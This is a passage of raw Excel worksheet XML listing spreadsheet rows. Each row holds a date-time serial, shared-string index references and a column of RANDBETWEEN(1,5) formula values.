      <c r="F18171">
        <f t="shared" ca="1" si="283"/>
        <v>3</v>
      </c>
    </row>
    <row r="18172" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18172" s="1">
        <v>43168.579884259256</v>
      </c>
      <c r="C18172" t="s">
        <v>10</v>
      </c>
      <c r="D18172" t="s">
        <v>89</v>
      </c>
      <c r="E18172" t="s">
        <v>16278</v>
      </c>
      <c r="F18172">
        <f t="shared" ca="1" si="283"/>
        <v>2</v>
      </c>
    </row>
    <row r="18173" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18173" s="1">
        <v>43168.575648148151</v>
      </c>
      <c r="C18173" t="s">
        <v>260</v>
      </c>
      <c r="E18173" t="s">
        <v>16279</v>
      </c>
      <c r="F18173">
        <f t="shared" ca="1" si="283"/>
        <v>5</v>
      </c>
    </row>
    <row r="18174" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A18174" s="1">
        <v>43168.57403935185</v>
      </c>
      <c r="C18174" t="s">
        <v>5361</v>
      </c>
      <c r="D18174" t="s">
        <v>232</v>
      </c>
      <c r="E18174" s="2" t="s">
        <v>15609</v>
      </c>
      <c r="F18174">
        <f t="shared" ca="1" si="283"/>
        <v>1</v>
      </c>
    </row>
    <row r="18175" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A18175" s="1">
        <v>43168.556134259263</v>
      </c>
      <c r="C18175" t="s">
        <v>231</v>
      </c>
      <c r="D18175" t="s">
        <v>124</v>
      </c>
      <c r="E18175" s="2" t="s">
        <v>15609</v>
      </c>
      <c r="F18175">
        <f t="shared" ca="1" si="283"/>
        <v>4</v>
      </c>
    </row>
    <row r="18176" spans="1:6" ht="360" x14ac:dyDescent="0.25">
      <c r="A18176" s="1">
        <v>43168.524062500001</v>
      </c>
      <c r="C18176" t="s">
        <v>16</v>
      </c>
      <c r="E18176" s="2" t="s">
        <v>16280</v>
      </c>
      <c r="F18176">
        <f t="shared" ca="1" si="283"/>
        <v>2</v>
      </c>
    </row>
    <row r="18177" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18177" s="1">
        <v>43168.521828703706</v>
      </c>
      <c r="C18177" t="s">
        <v>48</v>
      </c>
      <c r="E18177" t="s">
        <v>16281</v>
      </c>
      <c r="F18177">
        <f t="shared" ca="1" si="283"/>
        <v>2</v>
      </c>
    </row>
    <row r="18178" spans="1:6" ht="360" x14ac:dyDescent="0.25">
      <c r="A18178" s="1">
        <v>43168.512025462966</v>
      </c>
      <c r="C18178" t="s">
        <v>16</v>
      </c>
      <c r="E18178" s="2" t="s">
        <v>16280</v>
      </c>
      <c r="F18178">
        <f t="shared" ref="F18178:F18241" ca="1" si="284">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="18179" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18179" s="1">
        <v>43168.503819444442</v>
      </c>
      <c r="C18179" t="s">
        <v>10</v>
      </c>
      <c r="D18179" t="s">
        <v>158</v>
      </c>
      <c r="E18179" t="s">
        <v>16282</v>
      </c>
      <c r="F18179">
        <f t="shared" ca="1" si="284"/>
        <v>5</v>
      </c>
    </row>
    <row r="18180" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A18180" s="1">
        <v>43168.491273148145</v>
      </c>
      <c r="C18180" t="s">
        <v>29</v>
      </c>
      <c r="D18180" t="s">
        <v>178</v>
      </c>
      <c r="E18180" s="2" t="s">
        <v>16283</v>
      </c>
      <c r="F18180">
        <f t="shared" ca="1" si="284"/>
        <v>5</v>
      </c>
    </row>
    <row r="18181" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18181" s="1">
        <v>43168.486655092594</v>
      </c>
      <c r="C18181" t="s">
        <v>10</v>
      </c>
      <c r="D18181" t="s">
        <v>17</v>
      </c>
      <c r="E18181" t="s">
        <v>16284</v>
      </c>
      <c r="F18181">
        <f t="shared" ca="1" si="284"/>
        <v>3</v>
      </c>
    </row>
    <row r="18182" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18182" s="1">
        <v>43168.458472222221</v>
      </c>
      <c r="C18182" t="s">
        <v>10</v>
      </c>
      <c r="D18182" t="s">
        <v>192</v>
      </c>
      <c r="E18182" t="s">
        <v>16285</v>
      </c>
      <c r="F18182">
        <f t="shared" ca="1" si="284"/>
        <v>5</v>
      </c>
    </row>
    <row r="18183" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18183" s="1">
        <v>43168.454791666663</v>
      </c>
      <c r="C18183" t="s">
        <v>10</v>
      </c>
      <c r="D18183" t="s">
        <v>89</v>
      </c>
      <c r="E18183" t="s">
        <v>16286</v>
      </c>
      <c r="F18183">
        <f t="shared" ca="1" si="284"/>
        <v>1</v>
      </c>
    </row>
    <row r="18184" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18184" s="1">
        <v>43168.424444444441</v>
      </c>
      <c r="C18184" t="s">
        <v>103</v>
      </c>
      <c r="E18184" s="2" t="s">
        <v>16287</v>
      </c>
      <c r="F18184">
        <f t="shared" ca="1" si="284"/>
        <v>4</v>
      </c>
    </row>
    <row r="18185" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18185" s="1">
        <v>43168.413842592592</v>
      </c>
      <c r="C18185" t="s">
        <v>41</v>
      </c>
      <c r="E18185" t="s">
        <v>16288</v>
      </c>
      <c r="F18185">
        <f t="shared" ca="1" si="284"/>
        <v>3</v>
      </c>
    </row>
    <row r="18186" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18186" s="1">
        <v>43168.389675925922</v>
      </c>
      <c r="C18186" t="s">
        <v>4508</v>
      </c>
      <c r="D18186" t="s">
        <v>381</v>
      </c>
      <c r="E18186" s="2" t="s">
        <v>16289</v>
      </c>
      <c r="F18186">
        <f t="shared" ca="1" si="284"/>
        <v>1</v>
      </c>
    </row>
    <row r="18187" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A18187" s="1">
        <v>43168.38658564815</v>
      </c>
      <c r="C18187" t="s">
        <v>461</v>
      </c>
      <c r="E18187" s="2" t="s">
        <v>16290</v>
      </c>
      <c r="F18187">
        <f t="shared" ca="1" si="284"/>
        <v>4</v>
      </c>
    </row>
    <row r="18188" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18188" s="1">
        <v>43168.384039351855</v>
      </c>
      <c r="C18188" t="s">
        <v>124</v>
      </c>
      <c r="E18188" t="s">
        <v>16291</v>
      </c>
      <c r="F18188">
        <f t="shared" ca="1" si="284"/>
        <v>4</v>
      </c>
    </row>
    <row r="18189" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A18189" s="1">
        <v>43168.373564814814</v>
      </c>
      <c r="C18189" t="s">
        <v>65</v>
      </c>
      <c r="E18189" s="2" t="s">
        <v>16292</v>
      </c>
      <c r="F18189">
        <f t="shared" ca="1" si="284"/>
        <v>5</v>
      </c>
    </row>
    <row r="18190" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18190" s="1">
        <v>43168.362754629627</v>
      </c>
      <c r="C18190" t="s">
        <v>16</v>
      </c>
      <c r="E18190" t="s">
        <v>16293</v>
      </c>
      <c r="F18190">
        <f t="shared" ca="1" si="284"/>
        <v>3</v>
      </c>
    </row>
    <row r="18191" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A18191" s="1">
        <v>43168.345543981479</v>
      </c>
      <c r="C18191" t="s">
        <v>124</v>
      </c>
      <c r="D18191" t="s">
        <v>312</v>
      </c>
      <c r="E18191" s="2" t="s">
        <v>16294</v>
      </c>
      <c r="F18191">
        <f t="shared" ca="1" si="284"/>
        <v>1</v>
      </c>
    </row>
    <row r="18192" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18192" s="1">
        <v>43168.336921296293</v>
      </c>
      <c r="C18192" t="s">
        <v>10375</v>
      </c>
      <c r="D18192" t="s">
        <v>86</v>
      </c>
      <c r="E18192" s="2" t="s">
        <v>16295</v>
      </c>
      <c r="F18192">
        <f t="shared" ca="1" si="284"/>
        <v>5</v>
      </c>
    </row>
    <row r="18193" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A18193" s="1">
        <v>43168.335185185184</v>
      </c>
      <c r="C18193" t="s">
        <v>10</v>
      </c>
      <c r="D18193" t="s">
        <v>80</v>
      </c>
      <c r="E18193" s="2" t="s">
        <v>16296</v>
      </c>
      <c r="F18193">
        <f t="shared" ca="1" si="284"/>
        <v>3</v>
      </c>
    </row>
    <row r="18194" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18194" s="1">
        <v>43168.32167824074</v>
      </c>
      <c r="C18194" t="s">
        <v>48</v>
      </c>
      <c r="E18194" t="s">
        <v>16297</v>
      </c>
      <c r="F18194">
        <f t="shared" ca="1" si="284"/>
        <v>4</v>
      </c>
    </row>
    <row r="18195" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A18195" s="1">
        <v>43168.319444444445</v>
      </c>
      <c r="C18195" t="s">
        <v>6</v>
      </c>
      <c r="D18195" t="s">
        <v>25</v>
      </c>
      <c r="E18195" s="2" t="s">
        <v>16298</v>
      </c>
      <c r="F18195">
        <f t="shared" ca="1" si="284"/>
        <v>1</v>
      </c>
    </row>
    <row r="18196" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18196" s="1">
        <v>43168.318819444445</v>
      </c>
      <c r="C18196" t="s">
        <v>189</v>
      </c>
      <c r="E18196" t="s">
        <v>16299</v>
      </c>
      <c r="F18196">
        <f t="shared" ca="1" si="284"/>
        <v>1</v>
      </c>
    </row>
    <row r="18197" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A18197" s="1">
        <v>43168.302048611113</v>
      </c>
      <c r="C18197" t="s">
        <v>71</v>
      </c>
      <c r="D18197" t="s">
        <v>312</v>
      </c>
      <c r="E18197" s="2" t="s">
        <v>16300</v>
      </c>
      <c r="F18197">
        <f t="shared" ca="1" si="284"/>
        <v>5</v>
      </c>
    </row>
    <row r="18198" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A18198" s="1">
        <v>43168.295844907407</v>
      </c>
      <c r="C18198" t="s">
        <v>48</v>
      </c>
      <c r="E18198" s="2" t="s">
        <v>16301</v>
      </c>
      <c r="F18198">
        <f t="shared" ca="1" si="284"/>
        <v>5</v>
      </c>
    </row>
    <row r="18199" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18199" s="1">
        <v>43168.289131944446</v>
      </c>
      <c r="C18199" t="s">
        <v>1501</v>
      </c>
      <c r="D18199" t="s">
        <v>251</v>
      </c>
      <c r="E18199" t="s">
        <v>16104</v>
      </c>
      <c r="F18199">
        <f t="shared" ca="1" si="284"/>
        <v>5</v>
      </c>
    </row>
    <row r="18200" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18200" s="1">
        <v>43168.278865740744</v>
      </c>
      <c r="C18200" t="s">
        <v>1377</v>
      </c>
      <c r="D18200" t="s">
        <v>494</v>
      </c>
      <c r="E18200" t="s">
        <v>16104</v>
      </c>
      <c r="F18200">
        <f t="shared" ca="1" si="284"/>
        <v>2</v>
      </c>
    </row>
    <row r="18201" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18201" s="1">
        <v>43168.263784722221</v>
      </c>
      <c r="C18201" t="s">
        <v>48</v>
      </c>
      <c r="F18201">
        <f t="shared" ca="1" si="284"/>
        <v>1</v>
      </c>
    </row>
    <row r="18202" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18202" s="1">
        <v>43168.25372685185</v>
      </c>
      <c r="C18202" t="s">
        <v>41</v>
      </c>
      <c r="E18202" t="s">
        <v>16302</v>
      </c>
      <c r="F18202">
        <f t="shared" ca="1" si="284"/>
        <v>1</v>
      </c>
    </row>
    <row r="18203" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18203" s="1">
        <v>43168.236620370371</v>
      </c>
      <c r="C18203" t="s">
        <v>41</v>
      </c>
      <c r="E18203" t="s">
        <v>16303</v>
      </c>
      <c r="F18203">
        <f t="shared" ca="1" si="284"/>
        <v>5</v>
      </c>
    </row>
    <row r="18204" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18204" s="1">
        <v>43168.235486111109</v>
      </c>
      <c r="C18204" t="s">
        <v>1080</v>
      </c>
      <c r="D18204" t="s">
        <v>56</v>
      </c>
      <c r="E18204" s="2" t="s">
        <v>16304</v>
      </c>
      <c r="F18204">
        <f t="shared" ca="1" si="284"/>
        <v>3</v>
      </c>
    </row>
    <row r="18205" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18205" s="1">
        <v>43168.2268287037</v>
      </c>
      <c r="C18205" t="s">
        <v>907</v>
      </c>
      <c r="E18205" t="s">
        <v>16305</v>
      </c>
      <c r="F18205">
        <f t="shared" ca="1" si="284"/>
        <v>3</v>
      </c>
    </row>
    <row r="18206" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A18206" s="1">
        <v>43168.226747685185</v>
      </c>
      <c r="C18206" t="s">
        <v>50</v>
      </c>
      <c r="E18206" s="2" t="s">
        <v>16306</v>
      </c>
      <c r="F18206">
        <f t="shared" ca="1" si="284"/>
        <v>5</v>
      </c>
    </row>
    <row r="18207" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18207" s="1">
        <v>43168.18954861111</v>
      </c>
      <c r="C18207" t="s">
        <v>1189</v>
      </c>
      <c r="D18207" t="s">
        <v>632</v>
      </c>
      <c r="E18207" s="2" t="s">
        <v>16307</v>
      </c>
      <c r="F18207">
        <f t="shared" ca="1" si="284"/>
        <v>3</v>
      </c>
    </row>
    <row r="18208" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A18208" s="1">
        <v>43168.148761574077</v>
      </c>
      <c r="C18208" t="s">
        <v>60</v>
      </c>
      <c r="E18208" s="2" t="s">
        <v>16308</v>
      </c>
      <c r="F18208">
        <f t="shared" ca="1" si="284"/>
        <v>3</v>
      </c>
    </row>
    <row r="18209" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A18209" s="1">
        <v>43168.145914351851</v>
      </c>
      <c r="C18209" t="s">
        <v>319</v>
      </c>
      <c r="D18209" t="s">
        <v>178</v>
      </c>
      <c r="E18209" s="2" t="s">
        <v>16309</v>
      </c>
      <c r="F18209">
        <f t="shared" ca="1" si="284"/>
        <v>1</v>
      </c>
    </row>
    <row r="18210" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A18210" s="1">
        <v>43168.128576388888</v>
      </c>
      <c r="C18210" t="s">
        <v>1130</v>
      </c>
      <c r="E18210" s="2" t="s">
        <v>16048</v>
      </c>
      <c r="F18210">
        <f t="shared" ca="1" si="284"/>
        <v>1</v>
      </c>
    </row>
    <row r="18211" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18211" s="1">
        <v>43168.088287037041</v>
      </c>
      <c r="C18211" t="s">
        <v>41</v>
      </c>
      <c r="E18211" t="s">
        <v>16310</v>
      </c>
      <c r="F18211">
        <f t="shared" ca="1" si="284"/>
        <v>2</v>
      </c>
    </row>
    <row r="18212" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A18212" s="1">
        <v>43168.056134259263</v>
      </c>
      <c r="C18212" t="s">
        <v>10</v>
      </c>
      <c r="D18212" t="s">
        <v>36</v>
      </c>
      <c r="E18212" s="2" t="s">
        <v>16311</v>
      </c>
      <c r="F18212">
        <f t="shared" ca="1" si="284"/>
        <v>1</v>
      </c>
    </row>
    <row r="18213" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A18213" s="1">
        <v>43168.046053240738</v>
      </c>
      <c r="C18213" t="s">
        <v>563</v>
      </c>
      <c r="D18213" t="s">
        <v>112</v>
      </c>
      <c r="E18213" s="2" t="s">
        <v>16312</v>
      </c>
      <c r="F18213">
        <f t="shared" ca="1" si="284"/>
        <v>5</v>
      </c>
    </row>
    <row r="18214" spans="1:6" ht="360" x14ac:dyDescent="0.25">
      <c r="A18214" s="1">
        <v>43168.025625000002</v>
      </c>
      <c r="C18214" t="s">
        <v>253</v>
      </c>
      <c r="E18214" s="2" t="s">
        <v>16313</v>
      </c>
      <c r="F18214">
        <f t="shared" ca="1" si="284"/>
        <v>3</v>
      </c>
    </row>
    <row r="18215" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18215" s="1">
        <v>43168.016284722224</v>
      </c>
      <c r="C18215" t="s">
        <v>140</v>
      </c>
      <c r="D18215" t="s">
        <v>141</v>
      </c>
      <c r="E18215" s="2" t="s">
        <v>16314</v>
      </c>
      <c r="F18215">
        <f t="shared" ca="1" si="284"/>
        <v>1</v>
      </c>
    </row>
    <row r="18216" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18216" s="1">
        <v>43168.015717592592</v>
      </c>
      <c r="C18216" t="s">
        <v>41</v>
      </c>
      <c r="E18216" t="s">
        <v>16315</v>
      </c>
      <c r="F18216">
        <f t="shared" ca="1" si="284"/>
        <v>2</v>
      </c>
    </row>
    <row r="18217" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A18217" s="1">
        <v>43167.965775462966</v>
      </c>
      <c r="C18217" t="s">
        <v>48</v>
      </c>
      <c r="E18217" s="2" t="s">
        <v>16316</v>
      </c>
      <c r="F18217">
        <f t="shared" ca="1" si="284"/>
        <v>1</v>
      </c>
    </row>
    <row r="18218" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A18218" s="1">
        <v>43167.964317129627</v>
      </c>
      <c r="C18218" t="s">
        <v>41</v>
      </c>
      <c r="E18218" s="2" t="s">
        <v>16317</v>
      </c>
      <c r="F18218">
        <f t="shared" ca="1" si="284"/>
        <v>4</v>
      </c>
    </row>
    <row r="18219" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A18219" s="1">
        <v>43167.899027777778</v>
      </c>
      <c r="C18219" t="s">
        <v>10</v>
      </c>
      <c r="D18219" t="s">
        <v>163</v>
      </c>
      <c r="E18219" s="2" t="s">
        <v>16318</v>
      </c>
      <c r="F18219">
        <f t="shared" ca="1" si="284"/>
        <v>3</v>
      </c>
    </row>
    <row r="18220" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18220" s="1">
        <v>43167.866053240738</v>
      </c>
      <c r="C18220" t="s">
        <v>140</v>
      </c>
      <c r="D18220" t="s">
        <v>36</v>
      </c>
      <c r="E18220" t="s">
        <v>16104</v>
      </c>
      <c r="F18220">
        <f t="shared" ca="1" si="284"/>
        <v>5</v>
      </c>
    </row>
    <row r="18221" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18221" s="1">
        <v>43167.863206018519</v>
      </c>
      <c r="C18221" t="s">
        <v>10</v>
      </c>
      <c r="D18221" t="s">
        <v>6</v>
      </c>
      <c r="F18221">
        <f t="shared" ca="1" si="284"/>
        <v>4</v>
      </c>
    </row>
    <row r="18222" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A18222" s="1">
        <v>43167.862696759257</v>
      </c>
      <c r="C18222" t="s">
        <v>477</v>
      </c>
      <c r="D18222" t="s">
        <v>80</v>
      </c>
      <c r="E18222" s="2" t="s">
        <v>15609</v>
      </c>
      <c r="F18222">
        <f t="shared" ca="1" si="284"/>
        <v>3</v>
      </c>
    </row>
    <row r="18223" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18223" s="1">
        <v>43167.85565972222</v>
      </c>
      <c r="C18223" t="s">
        <v>542</v>
      </c>
      <c r="D18223" t="s">
        <v>1993</v>
      </c>
      <c r="E18223" t="s">
        <v>16104</v>
      </c>
      <c r="F18223">
        <f t="shared" ca="1" si="284"/>
        <v>4</v>
      </c>
    </row>
    <row r="18224" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18224" s="1">
        <v>43167.847615740742</v>
      </c>
      <c r="C18224" t="s">
        <v>231</v>
      </c>
      <c r="D18224" t="s">
        <v>67</v>
      </c>
      <c r="E18224" t="s">
        <v>16104</v>
      </c>
      <c r="F18224">
        <f t="shared" ca="1" si="284"/>
        <v>3</v>
      </c>
    </row>
    <row r="18225" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18225" s="1">
        <v>43167.836805555555</v>
      </c>
      <c r="C18225" t="s">
        <v>14</v>
      </c>
      <c r="D18225" t="s">
        <v>667</v>
      </c>
      <c r="E18225" t="s">
        <v>16104</v>
      </c>
      <c r="F18225">
        <f t="shared" ca="1" si="284"/>
        <v>4</v>
      </c>
    </row>
    <row r="18226" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A18226" s="1">
        <v>43167.836469907408</v>
      </c>
      <c r="C18226" t="s">
        <v>73</v>
      </c>
      <c r="D18226" t="s">
        <v>67</v>
      </c>
      <c r="E18226" s="2" t="s">
        <v>15609</v>
      </c>
      <c r="F18226">
        <f t="shared" ca="1" si="284"/>
        <v>1</v>
      </c>
    </row>
    <row r="18227" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18227" s="1">
        <v>43167.830243055556</v>
      </c>
      <c r="C18227" t="s">
        <v>1189</v>
      </c>
      <c r="D18227" t="s">
        <v>56</v>
      </c>
      <c r="E18227" s="2" t="s">
        <v>16319</v>
      </c>
      <c r="F18227">
        <f t="shared" ca="1" si="284"/>
        <v>5</v>
      </c>
    </row>
    <row r="18228" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18228" s="1">
        <v>43167.828287037039</v>
      </c>
      <c r="C18228" t="s">
        <v>1189</v>
      </c>
      <c r="D18228" t="s">
        <v>52</v>
      </c>
      <c r="E18228" s="2" t="s">
        <v>16320</v>
      </c>
      <c r="F18228">
        <f t="shared" ca="1" si="284"/>
        <v>2</v>
      </c>
    </row>
    <row r="18229" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18229" s="1">
        <v>43167.826909722222</v>
      </c>
      <c r="C18229" t="s">
        <v>1189</v>
      </c>
      <c r="D18229" t="s">
        <v>750</v>
      </c>
      <c r="E18229" t="s">
        <v>16104</v>
      </c>
      <c r="F18229">
        <f t="shared" ca="1" si="284"/>
        <v>4</v>
      </c>
    </row>
    <row r="18230" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18230" s="1">
        <v>43167.826157407406</v>
      </c>
      <c r="C18230" t="s">
        <v>50</v>
      </c>
      <c r="D18230" t="s">
        <v>33</v>
      </c>
      <c r="E18230" t="s">
        <v>16104</v>
      </c>
      <c r="F18230">
        <f t="shared" ca="1" si="284"/>
        <v>4</v>
      </c>
    </row>
    <row r="18231" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18231" s="1">
        <v>43167.818888888891</v>
      </c>
      <c r="C18231" t="s">
        <v>10</v>
      </c>
      <c r="D18231" t="s">
        <v>6</v>
      </c>
      <c r="E18231" t="s">
        <v>16321</v>
      </c>
      <c r="F18231">
        <f t="shared" ca="1" si="284"/>
        <v>3</v>
      </c>
    </row>
    <row r="18232" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18232" s="1">
        <v>43167.816504629627</v>
      </c>
      <c r="C18232" t="s">
        <v>731</v>
      </c>
      <c r="D18232" t="s">
        <v>82</v>
      </c>
      <c r="E18232" t="s">
        <v>16104</v>
      </c>
      <c r="F18232">
        <f t="shared" ca="1" si="284"/>
        <v>3</v>
      </c>
    </row>
    <row r="18233" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18233" s="1">
        <v>43167.815312500003</v>
      </c>
      <c r="C18233" t="s">
        <v>144</v>
      </c>
      <c r="D18233" t="s">
        <v>821</v>
      </c>
      <c r="E18233" t="s">
        <v>16104</v>
      </c>
      <c r="F18233">
        <f t="shared" ca="1" si="284"/>
        <v>5</v>
      </c>
    </row>
    <row r="18234" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18234" s="1">
        <v>43167.811631944445</v>
      </c>
      <c r="C18234" t="s">
        <v>23</v>
      </c>
      <c r="D18234" t="s">
        <v>381</v>
      </c>
      <c r="E18234" t="s">
        <v>16104</v>
      </c>
      <c r="F18234">
        <f t="shared" ca="1" si="284"/>
        <v>4</v>
      </c>
    </row>
    <row r="18235" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18235" s="1">
        <v>43167.80804398148</v>
      </c>
      <c r="C18235" t="s">
        <v>1080</v>
      </c>
      <c r="D18235" t="s">
        <v>817</v>
      </c>
      <c r="E18235" t="s">
        <v>16104</v>
      </c>
      <c r="F18235">
        <f t="shared" ca="1" si="284"/>
        <v>2</v>
      </c>
    </row>
    <row r="18236" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18236" s="1">
        <v>43167.797511574077</v>
      </c>
      <c r="C18236" t="s">
        <v>2745</v>
      </c>
      <c r="D18236" t="s">
        <v>86</v>
      </c>
      <c r="E18236" t="s">
        <v>16104</v>
      </c>
      <c r="F18236">
        <f t="shared" ca="1" si="284"/>
        <v>3</v>
      </c>
    </row>
    <row r="18237" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18237" s="1">
        <v>43167.797291666669</v>
      </c>
      <c r="C18237" t="s">
        <v>1611</v>
      </c>
      <c r="D18237" t="s">
        <v>107</v>
      </c>
      <c r="E18237" t="s">
        <v>16104</v>
      </c>
      <c r="F18237">
        <f t="shared" ca="1" si="284"/>
        <v>5</v>
      </c>
    </row>
    <row r="18238" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A18238" s="1">
        <v>43167.786712962959</v>
      </c>
      <c r="C18238" t="s">
        <v>10</v>
      </c>
      <c r="D18238" t="s">
        <v>46</v>
      </c>
      <c r="E18238" s="2" t="s">
        <v>16322</v>
      </c>
      <c r="F18238">
        <f t="shared" ca="1" si="284"/>
        <v>2</v>
      </c>
    </row>
    <row r="18239" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A18239" s="1">
        <v>43167.786712962959</v>
      </c>
      <c r="C18239" t="s">
        <v>10</v>
      </c>
      <c r="D18239" t="s">
        <v>46</v>
      </c>
      <c r="E18239" s="2" t="s">
        <v>16322</v>
      </c>
      <c r="F18239">
        <f t="shared" ca="1" si="284"/>
        <v>4</v>
      </c>
    </row>
    <row r="18240" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18240" s="1">
        <v>43167.752939814818</v>
      </c>
      <c r="C18240" t="s">
        <v>10</v>
      </c>
      <c r="D18240" t="s">
        <v>46</v>
      </c>
      <c r="E18240" t="s">
        <v>16323</v>
      </c>
      <c r="F18240">
        <f t="shared" ca="1" si="284"/>
        <v>3</v>
      </c>
    </row>
    <row r="18241" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18241" s="1">
        <v>43167.743495370371</v>
      </c>
      <c r="C18241" t="s">
        <v>10</v>
      </c>
      <c r="D18241" t="s">
        <v>46</v>
      </c>
      <c r="E18241" t="s">
        <v>16324</v>
      </c>
      <c r="F18241">
        <f t="shared" ca="1" si="284"/>
        <v>3</v>
      </c>
    </row>
    <row r="18242" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A18242" s="1">
        <v>43167.738912037035</v>
      </c>
      <c r="C18242" t="s">
        <v>10</v>
      </c>
      <c r="D18242" t="s">
        <v>178</v>
      </c>
      <c r="E18242" s="2" t="s">
        <v>16325</v>
      </c>
      <c r="F18242">
        <f t="shared" ref="F18242:F18305" ca="1" si="285">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="18243" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18243" s="1">
        <v>43167.71297453704</v>
      </c>
      <c r="C18243" t="s">
        <v>10</v>
      </c>
      <c r="D18243" t="s">
        <v>80</v>
      </c>
      <c r="E18243" t="s">
        <v>16326</v>
      </c>
      <c r="F18243">
        <f t="shared" ca="1" si="285"/>
        <v>3</v>
      </c>
    </row>
    <row r="18244" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18244" s="1">
        <v>43167.711354166669</v>
      </c>
      <c r="C18244" t="s">
        <v>1189</v>
      </c>
      <c r="D18244" t="s">
        <v>750</v>
      </c>
      <c r="E18244" s="2" t="s">
        <v>16327</v>
      </c>
      <c r="F18244">
        <f t="shared" ca="1" si="285"/>
        <v>3</v>
      </c>
    </row>
    <row r="18245" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18245" s="1">
        <v>43167.710300925923</v>
      </c>
      <c r="C18245" t="s">
        <v>260</v>
      </c>
      <c r="E18245" t="s">
        <v>16328</v>
      </c>
      <c r="F18245">
        <f t="shared" ca="1" si="285"/>
        <v>2</v>
      </c>
    </row>
    <row r="18246" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18246" s="1">
        <v>43167.710092592592</v>
      </c>
      <c r="C18246" t="s">
        <v>48</v>
      </c>
      <c r="E18246" t="s">
        <v>16329</v>
      </c>
      <c r="F18246">
        <f t="shared" ca="1" si="285"/>
        <v>4</v>
      </c>
    </row>
    <row r="18247" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A18247" s="1">
        <v>43167.709675925929</v>
      </c>
      <c r="C18247" t="s">
        <v>1189</v>
      </c>
      <c r="D18247" t="s">
        <v>1036</v>
      </c>
      <c r="E18247" s="2" t="s">
        <v>16330</v>
      </c>
      <c r="F18247">
        <f t="shared" ca="1" si="285"/>
        <v>3</v>
      </c>
    </row>
    <row r="18248" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18248" s="1">
        <v>43167.693796296298</v>
      </c>
      <c r="C18248" t="s">
        <v>10</v>
      </c>
      <c r="D18248" t="s">
        <v>17</v>
      </c>
      <c r="E18248" t="s">
        <v>16331</v>
      </c>
      <c r="F18248">
        <f t="shared" ca="1" si="285"/>
        <v>4</v>
      </c>
    </row>
    <row r="18249" spans="1:6" ht="60" x14ac:dyDescent="0.25">
